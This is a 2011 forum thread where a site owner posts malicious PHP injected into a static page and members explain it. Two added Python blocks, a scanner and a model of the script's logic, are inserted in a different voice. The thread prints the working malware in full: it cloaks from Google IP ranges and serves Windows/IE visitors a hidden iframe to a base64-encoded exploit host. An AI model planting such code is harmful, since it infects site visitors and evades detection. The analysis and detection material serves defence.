
Site got hacked - can anyone decipher this?

Discussion in 'Black Hat SEO' started by Jared255, Jun 17, 2011.

  1. Jared255

    Jared255 Jr. Executive VIP Jr. VIP Premium Member

    Joined:
    May 10, 2009
    Messages:
    1,907
    Likes Received:
    1,663
    Location:
    Boston, MA
    Site is standard HTML/CSS; I found this at the bottom of the page under the </html> tag. Anyone?

    Code:
    <?
    
    function net_match ( $network , $ip ) {
    $ip_arr = explode ( '/' , $network );
    $network_long = ip2long ( $ip_arr [ 0 ]);
    $x = ip2long ( $ip_arr [ 1 ]);
    $mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
    $ip_long = ip2long ( $ip );
    return ( $ip_long & $mask ) == ( $network_long & $mask );
    }
    
    function net()
    {
    $ip=$_SERVER['REMOTE_ADDR'];
    
    if(
    net_match('64.233.160.0/19',$ip)==0 &&
    net_match('66.102.0.0/20',$ip)==0 &&
    net_match('66.249.64.0/19',$ip)==0 &&
    net_match('72.14.192.0/18',$ip)==0 &&
    net_match('74.125.0.0/16',$ip)==0 &&
    net_match('89.207.224.0/24',$ip)==0 &&
    net_match('193.142.125.0/24',$ip)==0 &&
    net_match('194.110.194.0/24',$ip)==0 &&
    net_match('209.85.128.0/17',$ip)==0 &&
    net_match('216.239.32.0/19',$ip)==0 &&
    net_match('128.111.0.0/16',$ip)==0 &&
    net_match('67.217.0.0/16',$ip)==0 &&
    net_match('188.93.0.0/16',$ip)==0
    )
    return true;
    }
    
    function detect_os() {
    global $os;
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    if(strpos($user_agent, "Windows") !== false) $os = 'windows';
    }detect_os();
    
    
    function detect_brows() {
    global $OOOOO0000, $OOOOOO000;
    $user_agent = $_SERVER["HTTP_USER_AGENT"];
    if (preg_match("/MSIE 6.0/", $user_agent) OR
        preg_match("/MSIE 7.0/", $user_agent) OR
        preg_match("/MSIE 8.0/", $user_agent)
    ) $OOOOOO000 = "MSIE";
    }detect_brows();
    
    $IP = $_SERVER['REMOTE_ADDR'].".log";
    
    function _log()
    { global $IP;
    touch ("/tmp/angry/{$IP}");
    }
    @mkdir('/tmp/angry/');
    function _check()
    {
    global $IP;
    if(!file_exists("/tmp/angry/{$IP}")) return true;
    }
    $dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuNDcuMTcxL0hvbWUvaW5kZXgucGhw');
    if(_check())
    {
    if(net())
    {
    if($os)
    {
    if($OOOOOO000 == "MSIE")
    {
    echo '<iframe frameborder=0 src="'.$dfjgkbl.'" width=1 height=1 scrolling=no></iframe>';
    
    _log();
    
    }}}}
    Thanks,

    Jared
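    A static check for exactly this kind of injection on a plain HTML site, added here as an example (it is not code from the thread). It flags anything appended after the final `</html>`, PHP tags in that trailer, `base64_decode()` literals that decode to a URL, the `/tmp/angry/` marker directory, and 1x1 iframes. The sample pages are constructed inline; only the base64 string and marker path are taken from the posted code.

    ```python
    """Static scanner for PHP appended after </html> in a static HTML site.
    Added example, not from the original post; indicators are taken from the
    injected script quoted above, sample pages are constructed."""
    import base64
    import re
    from pathlib import Path

    # base64_decode('...') literals as they appear in the injected PHP
    B64_CALL_RE = re.compile(rb"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
    # 1x1 iframe, the delivery element the injected script echoes
    HIDDEN_IFRAME_RE = re.compile(
        rb"<iframe[^>]*\bwidth=['\"]?1\b[^>]*\bheight=['\"]?1\b", re.I)
    # marker directory the injected script creates (from the posted code)
    MARKER_DIR = b"/tmp/angry/"


    def scan_html(content: bytes) -> list:
        """Return the list of indicator names found in one HTML document."""
        findings = []

        # 1. Anything non-blank after the last </html> is suspicious in a static page.
        close = content.lower().rfind(b"</html>")
        trailer = content[close + len(b"</html>"):] if close != -1 else b""
        if trailer.strip():
            findings.append("content_after_html_close")
            if b"<?" in trailer:
                findings.append("php_tag_after_html_close")

        # 2. base64 literals that decode to a URL hide the payload host from grep.
        for m in B64_CALL_RE.finditer(content):
            try:
                decoded = base64.b64decode(m.group(1), validate=True)
            except ValueError:          # binascii.Error is a ValueError subclass
                continue
            if decoded.startswith((b"http://", b"https://")):
                findings.append("base64_url:" + decoded.decode("ascii", "replace"))

        # 3. The script's own artefacts.
        if MARKER_DIR in content:
            findings.append("marker_dir_tmp_angry")
        if HIDDEN_IFRAME_RE.search(content):
            findings.append("hidden_1x1_iframe")
        return findings


    def scan_tree(root: str) -> dict:
        """Scan every .htm/.html file below root; return {path: findings} for hits only."""
        results = {}
        for path in Path(root).rglob("*"):
            if path.is_file() and path.suffix.lower() in (".htm", ".html"):
                hits = scan_html(path.read_bytes())
                if hits:
                    results[str(path)] = hits
        return results


    # Constructed samples: a clean page and one carrying a trailer like the posted one.
    CLEAN_SAMPLE = b"<html><body><p>hello</p></body></html>\n"
    INJECTED_SAMPLE = CLEAN_SAMPLE + b"""<?
    $dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuNDcuMTcxL0hvbWUvaW5kZXgucGhw');
    @mkdir('/tmp/angry/');
    echo '<iframe frameborder=0 src="'.$dfjgkbl.'" width=1 height=1 scrolling=no></iframe>';
    """

    if __name__ == "__main__":
        import sys
        # usage: python scan.py /path/to/docroot
        for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
            print(path, hits)
    ```

    Run it against the document root and against a known-clean backup; a file that only hits `content_after_html_close` may just have a stray newline, but the base64 URL, marker directory and 1x1 iframe together are a reliable signature for this specific injection.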
     
  2. mirrorer

    mirrorer Jr. VIP Jr. VIP

    Joined:
    Jan 30, 2009
    Messages:
    1,164
    Likes Received:
    1,029
    Just remove it, dude, or re-upload the original HTML/CSS file.
     
  3. thxflash

    thxflash Power Member

    Joined:
    Jan 20, 2009
    Messages:
    786
    Likes Received:
    131
    Location:
    Newport Beach, CA
    The base64 code is this "http://129.121.47.171/Home/index.php" = $dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuNDcuMTcxL0hvbWUvaW5kZXgucGhw');

    ;)

    Hope that helps!
     
    Last edited: Jun 17, 2011
  4. davids355

    davids355 Jr. VIP Jr. VIP Premium Member

    Joined:
    Apr 25, 2011
    Messages:
    8,789
    Likes Received:
    6,326
    Yes, forget about deciphering it; remove the code and track down the hole that let it in to start with, and make sure it doesn't happen again!
     
  5. JesusBack

    JesusBack Executive VIP Premium Member

    Joined:
    Sep 15, 2010
    Messages:
    1,159
    Likes Received:
    1,284
    Occupation:
    Almost done :D
    Location:
    {calm|cool|collected}
    Basically, someone is iframing another one of their own sites for some reason, blocking off a few IPs from seeing it (yours?) and only making it show on Windows+IE (browser virus?).

    And the fact that they're using an IP as their site means you don't really have a way to shut them down (so yeah, it's probably some malware being installed on all your Windows+IE users).
     
    • Thanks Thanks x 1
    Last edited: Jun 17, 2011
  6. r00tk3y

    r00tk3y BANNED BANNED

    Joined:
    Apr 5, 2011
    Messages:
    225
    Likes Received:
    19
    Could be iframed to a Java drive-by website.
     
  7. maximviper

    maximviper BANNED BANNED

    Joined:
    Oct 25, 2010
    Messages:
    338
    Likes Received:
    86
    Same thing happened with my sites. I also found millions of HTML pages, about 350 MB in size, had been uploaded to my hosting. I never understood the reason for them.
     
  8. Hostwinds

    Hostwinds Power Member UnGagged Attendee Enterprise Member

    Joined:
    May 17, 2010
    Messages:
    768
    Likes Received:
    544
    Occupation:
    C.E.O.
    Location:
    Oklahoma
    I wonder why they are blocking these huge IP ranges... maybe government IPs? I mean, who has a /16, honestly?
     
  9. bezopravin

    bezopravin BANNED BANNED

    Joined:
    May 11, 2010
    Messages:
    461
    Likes Received:
    3,471
    Those are all the IPs of Google.

    Edit :

    From what I am seeing, when someone visits your site, the script checks whether the visitor is a Googlebot. If not, it checks the OS. If it's Windows, the script then continues execution and checks the browser. If it's IE, then it checks its log whether the visitor already visited your site. If yes, it opens this URL in an iframe: http://129.121.47.171/Home/index.php. If not, it creates a folder inside the temp directory /tmp/angry/. The name of the created folder will be the visitor's IP address.


    You can see all the sites affected by this virus: http://www.google.com/search?q=inurl:/tmp/angry/&hl=en&safe=off&client=firefox-a&hs=W6M&rls=org.mozilla:en-GB:official&prmd=ivns&ei=4cr7TcKqCcXnrAeI8e3YDw&start=0&sa=N&biw=1442&bih=722

    The creator of this virus doesn't want your site to be marked as an infected site by Google. You can see "This site may harm your computer." (http://www.google.com/support/bin/answer.py?answer=45449&topic=360&hl=en&?sa=X&ei=wc77TabgAsPRrQeYpsjkDw&ved=0CEIQ2gEwBg) under the results on the above link. That's why he blocked all Google IPs. Pretty clever!
     
    • Thanks Thanks x 1
    Last edited: Jun 17, 2011
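    The gating logic of the posted script and bezopravin's walkthrough of it, modelled as an added example (this is my code, not the script from the thread or anything bezopravin wrote). It keeps the four checks in the order the PHP applies them (marker file, excluded networks, Windows, IE 6/7/8); `net_match()` uses Python's `ipaddress` module in place of the hand-rolled mask arithmetic, and a set stands in for the `/tmp/angry/<ip>.log` marker files. One detail worth seeing run: `_check()` in the original returns true only while no marker exists, so each address receives the iframe on its first qualifying visit and is then silent, which is why the injected page looks clean to anyone (a crawler, or the site owner) who reloads it. The visits below are constructed with documentation address ranges and invented user agents.

    ```python
    """Analyst's model of the gating logic in the injected script.
    Added example, not code from the thread; network list and browser strings
    are copied from the posted PHP, visits are constructed."""
    import ipaddress

    # Networks the script's net() refuses to serve (copied from the posted code).
    EXCLUDED_NETWORKS = [ipaddress.ip_network(n) for n in (
        "64.233.160.0/19", "66.102.0.0/20", "66.249.64.0/19", "72.14.192.0/18",
        "74.125.0.0/16", "89.207.224.0/24", "193.142.125.0/24", "194.110.194.0/24",
        "209.85.128.0/17", "216.239.32.0/19", "128.111.0.0/16", "67.217.0.0/16",
        "188.93.0.0/16",
    )]
    # Browser strings detect_brows() looks for.
    IE_MARKERS = ("MSIE 6.0", "MSIE 7.0", "MSIE 8.0")


    def net_match(network: str, ip: str) -> bool:
        """Same question as the script's net_match(): is ip inside network?"""
        return ipaddress.ip_address(ip) in ipaddress.ip_network(network, strict=False)


    def in_excluded_range(ip: str) -> bool:
        """Equivalent of net() returning false: the address is in one of the ranges."""
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in EXCLUDED_NETWORKS)


    def decide(ip: str, user_agent: str, logged: set) -> tuple:
        """Return (serve_iframe, reason) for one request.

        `logged` stands in for the /tmp/angry/<ip>.log marker files: the script
        touches one after serving the iframe and _check() fails once it exists,
        so each IP is served at most once.
        """
        if ip in logged:                                    # _check()
            return False, "already_logged"
        if in_excluded_range(ip):                           # net()
            return False, "excluded_network"
        if "Windows" not in user_agent:                     # detect_os()
            return False, "not_windows"
        if not any(m in user_agent for m in IE_MARKERS):    # detect_brows()
            return False, "not_ie_6_7_8"
        logged.add(ip)                                      # _log()
        return True, "iframe_served"


    def simulate(visits) -> list:
        """Run a sequence of (ip, user_agent) visits through decide(), keeping state."""
        logged = set()
        return [decide(ip, ua, logged) for ip, ua in visits]


    # Constructed visits: documentation address ranges, invented user agents.
    SAMPLE_VISITS = [
        ("66.249.66.1", "Mozilla/5.0 (compatible; Googlebot/2.1)"),
        ("203.0.113.5", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"),
        ("203.0.113.5", "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"),
        ("198.51.100.7", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6) Safari/533"),
        ("198.51.100.8", "Mozilla/5.0 (Windows NT 6.1; rv:4.0) Firefox/4.0"),
    ]

    if __name__ == "__main__":
        for (ip, ua), (served, why) in zip(SAMPLE_VISITS, simulate(SAMPLE_VISITS)):
            print(f"{ip:<14} {'IFRAME' if served else '-':<6} {why}")
    ```

    The once-per-IP behaviour is also the practical lesson for anyone checking their own site: fetching the page from an address that has already been served, or from a crawler range, shows nothing, so verify the files on disk rather than trusting what a browser renders.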
  10. Hostwinds

    Hostwinds Power Member UnGagged Attendee Enterprise Member

    Joined:
    May 17, 2010
    Messages:
    768
    Likes Received:
    544
    Occupation:
    C.E.O.
    Location:
    Oklahoma
    That is insane, there are 65,536 IPs in a /16...

    You're 100% right though, Rwhois doesn't lie.
     
  11. pheezy9

    pheezy9 Newbie

    Joined:
    Jul 25, 2011
    Messages:
    1
    Likes Received:
    0
    My site got hacked with the same exact code. Would you be kind enough to tell me a little about your experience with it? I keep removing the code, but the malicious code keeps getting added to the same file and other files =/
     
  12. eskimo

    eskimo Regular Member

    Joined:
    Dec 1, 2008
    Messages:
    474
    Likes Received:
    178
    The script is creating an iframe (except for a bunch of IPs; for them it doesn't show).
    The iframe points to
    Code:
    http://129.121.47.171/
    which is
    Code:
    http://www.callingcards.com
     
  13. jon_xx_x

    jon_xx_x Jr. VIP Jr. VIP

    Joined:
    Nov 15, 2008
    Messages:
    3,108
    Likes Received:
    1,458
    Was gonna guess Google.

     
  14. altschule

    altschule Regular Member

    Joined:
    Sep 1, 2010
    Messages:
    282
    Likes Received:
    185
    Location:
    Sector 9
    Also...
    Code:
    http://koreacallingcards.com/
    whois shows a name, address, phone, and fax.
     
  15. itslookingback

    itslookingback Newbie

    Joined:
    Apr 11, 2011
    Messages:
    14
    Likes Received:
    0
    Iframe leading to an exploit pack.
     
  16. Drink More Tea

    Drink More Tea Regular Member

    Joined:
    Apr 15, 2011
    Messages:
    208
    Likes Received:
    166
    If you got hacked, it's a 99% probability that it was either via insecure passwords or an insecure installation of some software on the server on which your site resides.